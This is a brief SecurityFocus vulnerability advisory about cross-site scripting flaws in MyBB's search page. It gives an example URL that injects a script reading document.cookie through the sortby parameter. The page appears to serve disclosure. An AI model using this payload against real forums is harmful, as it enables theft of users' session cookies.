MyBB Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

An example URI has been provided:

http://www.example.com/mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script
language=javascript>alert(document.cookie)/script>&sorder=1&showresults=threads&submit=Search


 

Privacy Statement
Copyright 2010, SecurityFocus